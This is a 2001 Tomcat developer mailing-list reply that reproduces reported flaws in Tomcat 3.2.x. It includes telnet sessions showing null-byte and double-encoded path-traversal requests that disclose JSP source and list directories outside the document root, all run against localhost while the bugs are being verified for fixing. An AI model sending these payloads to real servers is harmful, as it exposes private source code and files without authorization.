On Wed, Apr 04, 2001 at 08:35:11AM -0500, Marc Saegesser wrote:
> Has anyone on tomcat-dev been able to reproduce these problems using Tomcat
> 3.2.x? I've been trying to reproduce the error using 3.2.1, 3.2.2b2 and
> even 3.1.1. So far I always get a 404. I've never been able to get
> directory listing or JSP source.
[...]
> > > exploits:
> > > http://target:8080/%2e%2e/%2e%2e/%00.jsp
> > > It is possible to cause the Tomcat server to Listing
> > > outside the document root directory scope.
I can't reproduce that one, but could verify the following problems
on Linux:
$ telnet localhost 8080
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Tue, 03 Apr 2001 14:49:28 GMT
Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
[numguess.jsp source follows]
$ telnet localhost 8180
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp%00
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Wed, 04 Apr 2001 10:37:30 GMT
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
[numguess.jsp source follows]
$ telnet localhost 8180
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /%252e%252e/%252e%252e/%00.jsp
HTTP/1.0 200 OK
Content-Type: text/html;charset=ISO-8859-1
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
[directory listing follows]
--
Stephan Seyboth - Developer
Caldera (Deutschland) GmbH
http://www.caldera.de/
